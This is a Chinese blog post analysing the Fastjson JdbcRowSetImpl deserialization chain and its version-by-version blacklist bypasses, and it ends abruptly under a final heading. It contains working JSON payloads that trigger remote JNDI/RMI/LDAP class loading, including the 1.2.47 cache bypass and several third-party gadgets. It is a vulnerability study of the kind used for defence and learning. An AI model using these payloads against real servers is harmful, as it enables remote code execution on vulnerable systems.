<!DOCTYPE html>
<html lang="zh-CN" color-mode="light">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="keywords" content="" />
  <meta name="author" content="Okaytc" />
  <meta name="description" content="生活 健身 学习 沉淀" />
  
  
  <title>
    
      java安全-Fastjson-JdbcRowSetImpl利用链及高版本绕过分析 
      
      
      |
    
     Okaytc
  </title>

  
    <link rel="apple-touch-icon" href="/images/head.jpg">
    <link rel="icon" href="/images/head.jpg">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  <link rel="stylesheet" href="/css/main.css" />
  <link rel="stylesheet" href="//at.alicdn.com/t/font_1886449_67xjft27j1l.css" />
  <!-- 代码块风格 -->
  
    
<link rel="stylesheet" href="/css/figcaption/mac-block.css">

  

  <!-- jquery3.3.1 -->
  
    <script defer type="text/javascript" src="/plugins/jquery.min.js"></script>
  

  <!-- fancybox -->
  
    <link href="/plugins/jquery.fancybox.min.css" rel="stylesheet">
    <script defer type="text/javascript" src="/plugins/jquery.fancybox.min.js"></script>
  
  
<script src="/js/fancybox.js"></script>


  

  

  <script>
    var html = document.documentElement
    const colorMode = localStorage.getItem('color-mode')
    if (colorMode) {
      document.documentElement.setAttribute('color-mode', colorMode)
    }
  </script>
<meta name="generator" content="Hexo 6.3.0"></head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/images/head.jpg" alt="">
      
    </a>
    <div class="nickname"><a href="/">Okaytc</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">主页</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">文章</a>
        </li>
      
        <li class="nav-item" data-path="/tags/">
          <a href="/tags/">标签</a>
        </li>
      
        <li class="nav-item" data-path="/friends/">
          <a href="/friends/">友链</a>
        </li>
      
        <li class="nav-item" data-path="/about/">
          <a href="/about/">关于</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->


  <!-- LaTex Display -->

  
    <script async type="text/javascript" src="/plugins/mathjax/tex-chtml.js"></script>
  
  <script>
    MathJax = {
      tex: {
        inlineMath: [['$', '$'], ['\\(', '\\)']]
      }
    }
  </script>





  <!-- clipboard -->

  
    <script async type="text/javascript" src="/plugins/clipboard.min.js"></script>
  
  
<script src="/js/codeCopy.js"></script>







  

  

  

  
  <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
  <div class="container post-details" id="post-details">
    <div class="post-content">
      <div class="post-title">java安全-Fastjson-JdbcRowSetImpl利用链及高版本绕过分析</div>
      <div class="post-attach">
        <span class="post-pubtime">
          <i class="iconfont icon-updatetime mr-10" title="更新时间"></i>
          2023-02-15 10:00:00
        </span>
        
              <span class="post-tags">
                <i class="iconfont icon-tags mr-10" title="标签"></i>
                
                <span class="span--tag mr-8">
                  <a href="/tags/Java%E5%AE%89%E5%85%A8/" title="Java安全">
                    #Java安全
                  </a>
                </span>
                
                <span class="span--tag mr-8">
                  <a href="/tags/Java%E5%88%A9%E7%94%A8%E9%93%BE/" title="Java利用链">
                    #Java利用链
                  </a>
                </span>
                
              </span>
          
      </div>
      <div class="markdown-body">
        <h1 id="0x00、前言"><a href="#0x00、前言" class="headerlink" title="0x00、前言"></a>0x00、前言</h1><p>这个内容网上学习文章很多，跟着走一遍理下原理思路</p>
<h1 id="0x01、JdbcRowSetImpl利用链分析"><a href="#0x01、JdbcRowSetImpl利用链分析" class="headerlink" title="0x01、JdbcRowSetImpl利用链分析"></a>0x01、JdbcRowSetImpl利用链分析</h1><h2 id="一、知识前提"><a href="#一、知识前提" class="headerlink" title="一、知识前提"></a>一、知识前提</h2><p>前置知识（JNDI、RMI、LDAP）已经在<a href="https://okaytc.github.io/posts/ad3be040.html">这篇学习</a>了<br>Fastjson的基础知识在<a href="https://okaytc.github.io/posts/ad3be047.html">这篇学习</a>了</p>
<p>其它没什么，先看<code>JdbcRowSetImpl</code>利用链的<code>Payload</code></p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">Payload_jdbc</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        String payload=<span class="string">&quot;&#123;\&quot;@type\&quot;:\&quot;com.sun.rowset.JdbcRowSetImpl\&quot;, \&quot;dataSourceName\&quot;:\&quot;rmi://127.0.0.1:1099/RMIObject\&quot;, \&quot;autoCommit\&quot;:true&#125;&quot;</span>;</span><br><span class="line">        JSON.parse(payload);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>json参数为三个：<code>com.sun.rowset.JdbcRowSetImpl类名</code>、<code>dataSourceName</code>、<code>autoCommit</code></p>
<p>影响范围：<br>1、fastjson &lt;&#x3D; 1.2.24</p>
<p>2、jdk版本：<br>JNDI-RMI:<br><font color="red">JDK 5 U45,JDK 6 U45,JDK 7u21,JDK 8u121</font>开始java.rmi.server.useCodebaseOnly默认配置已经改为了true。<br><font color="red">JDK 6u132, JDK 7u122, JDK 8u113</font>开始com.sun.jndi.rmi.object.trustURLCodebase默认值已改为了false。<br>JNDI-LDAP:<br>2018年10月，Java修复了该利用点，对LDAP Reference远程工厂类的加载增加了限制<br>范围：<font color="red">Oracle JDK 11.0.1、8u191、7u201、6u211</font>之后 com.sun.jndi.ldap.object.trustURLCodebase 属性的默认值被调整为false，需要人工调整至true</p>
<p>该链使用场景:<br>需要出网、通过JNDI远程加载RMI&#x2F;LDAP，版本要求同RMI&#x2F;LDAP限制版本一样，高版本会默认关闭远程地址，只有手动添加信任地址进行调用。</p>
<h2 id="二、JdbcRowSetImpl本身"><a href="#二、JdbcRowSetImpl本身" class="headerlink" title="二、JdbcRowSetImpl本身"></a>二、JdbcRowSetImpl本身</h2><p>JdbcRowSetImpl链相比较其他链还是比较好理解的</p>
<p>触发点在<code>setAutoCommit</code>方法</p>
<p><img src="/posts/ad3be000/fj-1.png" title="setAutoCommit"></p>
<p>这里有个<code>conn</code>变量，用来获取对象连接，默认值为<code>null</code>未赋值，会进入到<code>else</code>代码段中，调用<code>connect()</code>方法</p>
<p><img src="/posts/ad3be000/fj-2.png" title="connect"></p>
<p><code>connect</code>方法的本意为获取<code>jdbc</code>连接，其中调用了JNDI远程调用地址</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="type">Context</span> <span class="variable">ctx</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">InitialContext</span>();</span><br><span class="line"><span class="type">DataSource</span> <span class="variable">ds</span> <span class="operator">=</span> (DataSource)ctx.lookup</span><br><span class="line">    (getDataSourceName());</span><br></pre></td></tr></table></figure>

<p>调用地址通过<code>getDataSourceName()</code>获取，因此如果<code>DataSourceName</code>变量可控，传入<code>DataSourceName</code>为恶意远程jndi服务，进行<code>lookup</code>调用时即可触发漏洞。</p>
<p>如下效果：</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line">JdbcRowSetImpl jr=<span class="keyword">new</span> <span class="title class_">JdbcRowSetImpl</span>();</span><br><span class="line">jr.setDataSourceName(<span class="string">&quot;rmi://127.0.0.1:1099/RMIObject&quot;</span>);</span><br><span class="line">System.out.println(jr.getDataSourceName());</span><br><span class="line">jr.setAutoCommit(<span class="literal">true</span>);</span><br></pre></td></tr></table></figure>

<p><img src="/posts/ad3be000/fj-3.png" title="触发漏洞"></p>
<h2 id="三、Fastjson-JdbcRowSetImpl"><a href="#三、Fastjson-JdbcRowSetImpl" class="headerlink" title="三、Fastjson-JdbcRowSetImpl"></a>三、Fastjson-JdbcRowSetImpl</h2><p>前面提到，只要传入<code>DataSourceName</code>名，同时调用<code>setAutoCommit</code>方法即可触发漏洞</p>
<p>回顾fastjson大体执行步骤：</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">JSON对象解析</span><br><span class="line">  -&gt;创建默认JSON解析器parser（方法：DefaultJSONParser）</span><br><span class="line">    -&gt;对解析器pareser进行解析序列化解析（方法：parseObject）</span><br><span class="line">      -&gt;根据token获取对应反序列化器deserializer（方法：getDeserializer）</span><br><span class="line">        -&gt;对反序列化器deserializer进行反序列化解析（方法：deserialize）</span><br><span class="line">          -&gt;对对象和方法名进行解析（方法：pareseObject）</span><br><span class="line">            -&gt;获取key值(@type)，类加载key对象Class</span><br><span class="line">              -&gt;搜寻类对象的反序列化器</span><br><span class="line">                -&gt;搜寻不到，再创建反序列化器（方法：createJavaBeanDeserializer）</span><br><span class="line">                -&gt;过程中，build javabeaninfo信息，存储setter/getter信息放入Fieldlist中</span><br><span class="line">                -&gt;过程中，对Fieldlist字段进行创建字段反序列化器createFieldDeserializer</span><br><span class="line">                -&gt;最后反序列化器JavaBeanDeserializer创建成功</span><br><span class="line">                  -&gt;正式对反序列化器进行反序列化操作(方法：deserialize)</span><br><span class="line">                    -&gt;通过sortedFieldDeserializers获取字段数据，然后实例化对象</span><br><span class="line">                      -&gt;解析对象字段属性进行模糊匹配查找属性前缀get/set是否存在，&quot;_&quot;符号进行删除等操作</span><br><span class="line">                        -&gt;对方法查找方法的反序列化器（方法：getFieldDeserializer）</span><br><span class="line">                          -&gt;通过方法反序列化器对方法属性进行解析(获取到类方法名)，通过setValue方法给字段赋值</span><br><span class="line">                            -&gt;通过反射调用执行方法</span><br></pre></td></tr></table></figure>

<p>这里主要分析<code>DataSourceName</code>的赋值以及<code>setAutoCommit</code>方法的调用，因为前大半段获取序列化器的流程在<a href="https://okaytc.github.io/posts/ad3be047.html">这篇分析</a>分析过了，流程一样，就分析一下后面触发的地方</p>
<p>跟进到模糊查询方法属性步骤，循环查询方法属性，先是匹配查询<code>dataSourceName</code>字段</p>
<p><img src="/posts/ad3be000/fj-4.png" title="smart"></p>
<p>通过<code>getFieldDeserializer</code>方法获取属性的解析器</p>
<p><img src="/posts/ad3be000/fj-5.png" title="getFieldDeserializer"></p>
<p>在<code>sortedFieldDeserializers</code>数组中找到字段解析器</p>
<p><img src="/posts/ad3be000/fj-6.png" title="sortedFieldDeserializers"></p>
<p>解析器找到后，对属性进行解析</p>
<p><img src="/posts/ad3be000/fj-7.png" title="parseField"></p>
<p>调用属性值解析器对属性值进行解析（获取字段的值）</p>
<p><img src="/posts/ad3be000/fj-8.png" title="deserialze"></p>
<p>获取到值过后，调用<code>setValue</code>方法进行赋值</p>
<p><img src="/posts/ad3be000/fj-9.png" title="deserialze"></p>
<p>通过反射获取方法名，再调用执行完成赋值</p>
<p><img src="/posts/ad3be000/fj-10.png" title="invoke"></p>
<p><code>dataSourceName</code>字段处理就完成，<code>AutoCommit</code>方法跟上面一样，就不重复写过程了</p>
<p><code>invoke</code>调用<code>setAutoCommit</code>方法，触发漏洞</p>
<p><img src="/posts/ad3be000/fj-11.png" title="invoke"></p>
<p><img src="/posts/ad3be000/fj-12.png" title="invoke"></p>
<h1 id="0x02、fastjson高版本绕过分析"><a href="#0x02、fastjson高版本绕过分析" class="headerlink" title="0x02、fastjson高版本绕过分析"></a>0x02、fastjson高版本绕过分析</h1><h2 id="1-2-25-1-2-41"><a href="#1-2-25-1-2-41" class="headerlink" title="1.2.25-1.2.41"></a>1.2.25-1.2.41</h2><p>1.2.24-41，更新情况：</p>
<ul>
<li>autotype默认关闭</li>
<li>添加 checkAutoType 方法进行黑白名单处理加载类</li>
</ul>
<p>版本更新至1.2.25-1.2.41区间中，再次运行会提示<code>autotype</code>不支持<br><img src="/posts/ad3be000/fj-13.png" title="错误"></p>
<p><img src="/posts/ad3be000/fj-14.png" title="checkautotype"></p>
<p><code>autotype</code>也是默认关闭的，需要手动开启</p>
<p><img src="/posts/ad3be000/fj-15.png" title="autotype"></p>
<p>然后经过白名单（白名单列表为空）循环判断，再经过黑名单循环判断，白名单会直接加载类，黑名单匹配会直接抛出异常</p>
<p><img src="/posts/ad3be000/fj-16.png" title="autotype"></p>
<p>黑名单的类：</p>
<p><img src="/posts/ad3be000/fj-17.png" title="autotype"></p>
<p>如果不是黑名单的类会到类加载步骤</p>
<p><img src="/posts/ad3be000/fj-18.png" title="loadClass"></p>
<p>其中会经过两个处理：</p>
<ul>
<li>开头为[符号，会将其删除然后再进行类加载</li>
<li>开头为L，结尾为;分号，会将其删除然后在进行类加载</li>
</ul>
<p>绕过思路就可以将类进行上述两种方法构造：</p>
<ul>
<li>“@type”:”Lcom.sun.rowset.JdbcRowSetImpl;”</li>
<li>“@type”:”[com.sun.rowset.JdbcRowSetImpl”</li>
</ul>
<p>然后手动开启autotype即可，得到payload：</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">    ParserConfig.getGlobalInstance().setAutoTypeSupport(<span class="literal">true</span>);</span><br><span class="line">    String payload=<span class="string">&quot;&#123;\&quot;@type\&quot;:\&quot;Lcom.sun.rowset.JdbcRowSetImpl;\&quot;, \&quot;dataSourceName\&quot;:\&quot;rmi://127.0.0.1:1099/RMIObject\&quot;, \&quot;autoCommit\&quot;:true&#125;\&quot;;&quot;</span>;</span><br><span class="line">    JSON.parse(payload);</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">    ParserConfig.getGlobalInstance().setAutoTypeSupport(<span class="literal">true</span>);</span><br><span class="line">    String payload=<span class="string">&quot;&#123;\&quot;@type\&quot;:\&quot;[com.sun.rowset.JdbcRowSetImpl\&quot;, \&quot;dataSourceName\&quot;:\&quot;rmi://127.0.0.1:1099/RMIObject\&quot;, \&quot;autoCommit\&quot;:true&#125;\&quot;;&quot;</span>;</span><br><span class="line">    JSON.parse(payload);</span><br></pre></td></tr></table></figure>

<p>但实际使用[为开头的方式会报错，遇到<code>parseArray</code>的时候会抛出异常</p>
<p><img src="/posts/ad3be000/fj-19.png" title="抛出异常"></p>
<p>提示在位置42处缺少[号,及第一个逗号的位置</p>
<p><img src="/posts/ad3be000/fj-21.png" title="抛出异常"></p>
<p>添加[符号<br><code>String payload=&quot;&#123;\&quot;@type\&quot;:\&quot;Lcom.sun.rowset.JdbcRowSetImpl;\&quot;[, \&quot;dataSourceName\&quot;:\&quot;rmi://127.0.0.1:1099/RMIObject\&quot;, \&quot;autoCommit\&quot;:true&#125;\&quot;;&quot;;</code></p>
<p>运行提示44位置缺少{符号，继续添加</p>
<p><img src="/posts/ad3be000/fj-27.png" title="绕过"></p>
<p><code>String payload=&quot;&#123;\&quot;@type\&quot;:\&quot;Lcom.sun.rowset.JdbcRowSetImpl;\&quot;[&#123;, \&quot;dataSourceName\&quot;:\&quot;rmi://127.0.0.1:1099/RMIObject\&quot;, \&quot;autoCommit\&quot;:true&#125;\&quot;;&quot;;</code></p>
<p>执行成功</p>
<p><img src="/posts/ad3be000/fj-28.png" title="绕过"></p>
<p>使用L开头;结尾的形式能正常绕过</p>
<p><img src="/posts/ad3be000/fj-20.png" title="正常绕过"></p>
<p>得到最后的payload：</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">    ParserConfig.getGlobalInstance().setAutoTypeSupport(<span class="literal">true</span>);</span><br><span class="line">    String payload=<span class="string">&quot;&#123;\&quot;@type\&quot;:\&quot;Lcom.sun.rowset.JdbcRowSetImpl;\&quot;, \&quot;dataSourceName\&quot;:\&quot;rmi://127.0.0.1:1099/RMIObject\&quot;, \&quot;autoCommit\&quot;:true&#125;\&quot;;&quot;</span>;</span><br><span class="line">    JSON.parse(payload);</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">    ParserConfig.getGlobalInstance().setAutoTypeSupport(<span class="literal">true</span>);</span><br><span class="line">    String payload=<span class="string">&quot;&#123;\&quot;@type\&quot;:\&quot;[com.sun.rowset.JdbcRowSetImpl\&quot;[&#123;, \&quot;dataSourceName\&quot;:\&quot;rmi://127.0.0.1:1099/RMIObject\&quot;, \&quot;autoCommit\&quot;:true&#125;\&quot;;&quot;</span>;</span><br><span class="line">    JSON.parse(payload);</span><br></pre></td></tr></table></figure>

<h2 id="1-2-25-1-2-42"><a href="#1-2-25-1-2-42" class="headerlink" title="1.2.25-1.2.42"></a>1.2.25-1.2.42</h2><p>修复情况:</p>
<ul>
<li>在checkautotype中新增了对首字母L的处理，匹配到L开头;结尾进行一层首尾字符过滤去除</li>
<li>对黑白名单类进行hash取值</li>
</ul>
<p>1.2.42版本在checkautotype方法中，先过滤了一层首尾符号</p>
<p><img src="/posts/ad3be000/fj-22.png" title="第一层过滤首尾符号"></p>
<p>然后通过hash去设置黑白名单，目的为了不让攻击者知道黑名单是什么明文内容</p>
<p><img src="/posts/ad3be000/fj-23.png" title="hash的黑白名单"><br><img src="/posts/ad3be000/fj-24.png" title="hash的黑白名单"></p>
<p>hash碰撞脚本：<a target="_blank" rel="noopener" href="https://github.com/LeadroyaL/fastjson-blacklist">https://github.com/LeadroyaL/fastjson-blacklist</a></p>
<p>若不是黑名单中的类，进入类加载，这里跟原来一样，会再次过滤首尾符号L&#x2F;;，其他没有变动<br><img src="/posts/ad3be000/fj-25.png" title="第二层过滤首尾符号"></p>
<p>可通过加两层L&#x2F;;即可绕过42版本的修复，[符号的绕过方式仍然可行，得到payload：</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">    ParserConfig.getGlobalInstance().setAutoTypeSupport(<span class="literal">true</span>);</span><br><span class="line">    String payload=<span class="string">&quot;&#123;\&quot;@type\&quot;:\&quot;LLcom.sun.rowset.JdbcRowSetImpl;;\&quot;, \&quot;dataSourceName\&quot;:\&quot;rmi://127.0.0.1:1099/RMIObject\&quot;, \&quot;autoCommit\&quot;:true&#125;&quot;</span>;</span><br><span class="line">    JSON.parse(payload);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">    ParserConfig.getGlobalInstance().setAutoTypeSupport(<span class="literal">true</span>);</span><br><span class="line">    String payload=<span class="string">&quot;&#123;\&quot;@type\&quot;:\&quot;[com.sun.rowset.JdbcRowSetImpl\&quot;[&#123;, \&quot;dataSourceName\&quot;:\&quot;rmi://127.0.0.1:1099/RMIObject\&quot;, \&quot;autoCommit\&quot;:true&#125;\&quot;;&quot;</span>;</span><br><span class="line">    JSON.parse(payload);</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>
<p><img src="/posts/ad3be000/fj-26.png" title="绕过42执行"><br><img src="/posts/ad3be000/fj-29.png" title="绕过42执行"></p>
<h2 id="1-2-25-1-2-43"><a href="#1-2-25-1-2-43" class="headerlink" title="1.2.25-1.2.43"></a>1.2.25-1.2.43</h2><p>修复方式：</p>
<ul>
<li>新增加对LL的判断。</li>
</ul>
<p>如果首字母为LL开头直接抛出异常，是L开头则去掉首尾符号</p>
<p><img src="/posts/ad3be000/fj-30.png" title="新增对LL的判断"></p>
<p>对L和LL都进行处理过后，L的绕过方法就走不通了，但是[方法还可以继续使用没有被过滤</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">    ParserConfig.getGlobalInstance().setAutoTypeSupport(<span class="literal">true</span>);</span><br><span class="line">    String payload=<span class="string">&quot;&#123;\&quot;@type\&quot;:\&quot;[com.sun.rowset.JdbcRowSetImpl\&quot;[&#123;, \&quot;dataSourceName\&quot;:\&quot;rmi://127.0.0.1:1099/RMIObject\&quot;, \&quot;autoCommit\&quot;:true&#125;\&quot;;&quot;</span>;</span><br><span class="line">    JSON.parse(payload);</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p><img src="/posts/ad3be000/fj-31.png" title="绕过43执行"></p>
<h2 id="1-2-25-1-2-44"><a href="#1-2-25-1-2-44" class="headerlink" title="1.2.25-1.2.44"></a>1.2.25-1.2.44</h2><p>修复方式：</p>
<ul>
<li>新增对[的判断</li>
</ul>
<p>如果匹配到首字符是[符号，则直接抛出异常，因此45版本中直接使用L和[的两条攻击方式都失效了</p>
<p><img src="/posts/ad3be000/fj-32.png" title="[判断过滤"></p>
<h2 id="1-2-25-1-2-45"><a href="#1-2-25-1-2-45" class="headerlink" title="1.2.25-1.2.45"></a>1.2.25-1.2.45</h2><p>绕过方式依赖第三方组件mybatis，版本在3.0.0&lt;3.5.0之间，该组件在当前版本不在黑名单当中</p>
<p><img src="/posts/ad3be000/fj-33.png" title="mybatis组件"></p>
<p>payload</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">    ParserConfig.getGlobalInstance().setAutoTypeSupport(<span class="literal">true</span>);</span><br><span class="line">    String payload=<span class="string">&quot;&#123;\&quot;@type\&quot;:\&quot;org.apache.ibatis.datasource.jndi.JndiDataSourceFactory\&quot;,\&quot;properties\&quot;:&#123;\&quot;data_source\&quot;:\&quot;rmi://127.0.0.1:1099/RMIObject\&quot;&#125;&#125;&quot;</span>;</span><br><span class="line">    JSON.parse(payload);</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>调用类为<code>org.apache.ibatis.datasource.jndi.JndiDataSourceFactory</code>，方法名为<code>properties</code>，参数为<code>data_source</code></p>
<p>这里比较好理解，fastjson通过<code>setter</code>器获取<code>properties</code>参数的<code>setproperties</code>方法，通过反射进行执行，这里的分析跟上面的JDBC链分析是一样的就不重复分析了</p>
<p><img src="/posts/ad3be000/fj-34.png" title="mybatis利用"></p>
<p>调用<code>setproperties</code>方法，该方法调用了JNDI，JNDI远程<code>lookup</code>地址为<code>properties.getProperty(DATA_SOURCE)</code>，也就是传入的<code>data_source</code>的值，触发漏洞</p>
<p><img src="/posts/ad3be000/fj-35.png" title="绕过45执行"></p>
<p>后面版本就将该类加到了黑名单当中</p>
<h2 id="1-2-25-1-2-47通杀绕过"><a href="#1-2-25-1-2-47通杀绕过" class="headerlink" title="1.2.25-1.2.47通杀绕过"></a>1.2.25-1.2.47通杀绕过</h2><p>payload:</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line">&#123;</span><br><span class="line">   <span class="string">&quot;a&quot;</span>:&#123;</span><br><span class="line">       <span class="string">&quot;@type&quot;</span>:<span class="string">&quot;java.lang.Class&quot;</span>,</span><br><span class="line">       <span class="string">&quot;val&quot;</span>:<span class="string">&quot;com.sun.rowset.JdbcRowSetImpl&quot;</span></span><br><span class="line">   &#125;,</span><br><span class="line">   <span class="string">&quot;b&quot;</span>:&#123;</span><br><span class="line">       <span class="string">&quot;@type&quot;</span>:<span class="string">&quot;com.sun.rowset.JdbcRowSetImpl&quot;</span>,</span><br><span class="line">       <span class="string">&quot;dataSourceName&quot;</span>:<span class="string">&quot;rmi://127.0.0.1:1099/RMIObject&quot;</span>,</span><br><span class="line">       <span class="string">&quot;autoCommit&quot;</span>:<span class="literal">true</span></span><br><span class="line">   &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>分析这里直接到关键步骤吧，前面流程跟上面分析的一样，直接循环调用到<code>parseObject</code>方法解析对象</p>
<p><img src="/posts/ad3be000/fj-36.png" title="parseObject"></p>
<p>然后会调用<code>checkautotype</code>进行黑白名单处理</p>
<p><img src="/posts/ad3be000/fj-37.png" title="checkautotype"></p>
<p>由于未开启<code>autoypesupport</code>，因此不会进入黑白名单匹配检测</p>
<p><img src="/posts/ad3be000/fj-38.png" title="autoypesupport"></p>
<p>由于<code>Map</code>为空，因此在<code>map</code>中找不到该<code>typename</code>，然后从<code>hashmap</code>中找到</p>
<p><img src="/posts/ad3be000/fj-39.png" title="map"></p>
<p>获取<code>clazz</code>和反序列化器<code>deserializer</code>后，进行反序列化<code>deserialze</code>操作</p>
<p><img src="/posts/ad3be000/fj-40.png" title="deserialze"></p>
<p>进入<code>MiscCodec.deserialze</code>方法，对解析对象进行解析获取值</p>
<p><img src="/posts/ad3be000/fj-41.png" title="parse"><br><img src="/posts/ad3be000/fj-42.png" title="val"></p>
<p>再将值赋值给<code>strVal</code></p>
<p><img src="/posts/ad3be000/fj-43.png" title="strVal"></p>
<p>然后判断<code>clazz</code>类型，进行不同处理，当<code>clazz</code>为<code>Class</code>类时，会进行类加载操作</p>
<p><img src="/posts/ad3be000/fj-44.png" title="loadClass"></p>
<p>跟进，调用缓存变量为<code>true</code>的<code>loadClass</code>方法</p>
<p><img src="/posts/ad3be000/fj-45.png" title="loadClass"></p>
<p>经过一些过滤判断，最后将<code>clazz</code>放入<code>map</code>缓存中</p>
<p><img src="/posts/ad3be000/fj-45.png" title="mappings.put"></p>
<p><font color="red">“a”主体的代码段的作用就在这里，利用java.lang.Class类绕过黑白名单然后将而已代码类写入map缓存中</font></p>
<p>然后再次循环解析对象到”b”这里，跟进<code>parseObject</code>方法</p>
<p><img src="/posts/ad3be000/fj-46.png" title="parseObject"></p>
<p>再次走到黑白名单过滤方法</p>
<p><img src="/posts/ad3be000/fj-47.png" title="checkautotype"></p>
<p>依旧，直接跳过黑白名单判断，从<code>mapping</code>缓存中读取类对象</p>
<p><img src="/posts/ad3be000/fj-48.png" title="checkautotype"></p>
<p>由于”a”主体代码执行的时候将恶意类<code>put</code>进了<code>mapping</code>缓存中，因此这个读取能读取到恶意类的<code>clazz</code>，绕过了黑白名单检测</p>
<p><img src="/posts/ad3be000/fj-49.png" title="获取clazz"></p>
<p>获取到<code>clazz</code>后，进行正式反序列化操作，后续的操作就不再分析了，跟上面分析<code>jdbc</code>的执行一样的流程</p>
<p><img src="/posts/ad3be000/fj-50.png" title="deserialze"></p>
<p><img src="/posts/ad3be000/fj-51.png" title="执行成功"></p>
<p>1.2.48版本过后修复把cache缓存标识改为了false，无法再使用该payload</p>
<p>大于48版本后面的基本上就是绕过黑名单限制的类，就不做分析了，跟前面类似，就记下网上公开的payload吧</p>
<h2 id="1-2-50-1-2-59"><a href="#1-2-50-1-2-59" class="headerlink" title="1.2.50-1.2.59"></a>1.2.50-1.2.59</h2><p>payload：<br>使用前提：开启autotype，</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line">&gt; &#123;<span class="string">&quot;@type&quot;</span>:<span class="string">&quot;com.zaxxer.hikari.HikariConfig&quot;</span>,<span class="string">&quot;metricRegistry&quot;</span>:<span class="string">&quot;ldap://localhost:1389/Exploit&quot;</span>&#125;</span><br><span class="line">&gt; &#123;<span class="string">&quot;@type&quot;</span>:<span class="string">&quot;com.zaxxer.hikari.HikariConfig&quot;</span>,<span class="string">&quot;healthCheckRegistry&quot;</span>:<span class="string">&quot;ldap://localhost:1389/Exploit&quot;</span>&#125;</span><br></pre></td></tr></table></figure>

<h2 id="1-2-50-1-2-60"><a href="#1-2-50-1-2-60" class="headerlink" title="1.2.50-1.2.60"></a>1.2.50-1.2.60</h2><p>payload:<br>无需开启autotype</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line">&gt; &#123;<span class="string">&quot;@type&quot;</span>:<span class="string">&quot;oracle.jdbc.connector.OracleManagedConnectionFactory&quot;</span>,<span class="string">&quot;xaDataSourceName&quot;</span>:<span class="string">&quot;rmi://10.10.20.166:1099/ExportObject&quot;</span>&#125;</span><br><span class="line">&gt; &#123;<span class="string">&quot;@type&quot;</span>:<span class="string">&quot;org.apache.commons.configuration.JNDIConfiguration&quot;</span>,<span class="string">&quot;prefix&quot;</span>:<span class="string">&quot;ldap://10.10.20.166:1389/ExportObject&quot;</span>&#125;</span><br></pre></td></tr></table></figure>

<h2 id="1-2-50-1-2-61"><a href="#1-2-50-1-2-61" class="headerlink" title="1.2.50-1.2.61"></a>1.2.50-1.2.61</h2><p>payload:</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line">&gt; &#123;<span class="string">&quot;@type&quot;</span>:<span class="string">&quot;org.apache.commons.proxy.provider.remoting.SessionBeanProvider&quot;</span>,<span class="string">&quot;jndiName&quot;</span>:<span class="string">&quot;ldap://localhost:1389/Exploit&quot;</span>,<span class="string">&quot;Object&quot;</span>:<span class="string">&quot;a&quot;</span>&#125;</span><br></pre></td></tr></table></figure>

<h2 id="1-2-24-1-2-62"><a href="#1-2-24-1-2-62" class="headerlink" title="1.2.24-1.2.62"></a>1.2.24-1.2.62</h2><p>payload:</p>
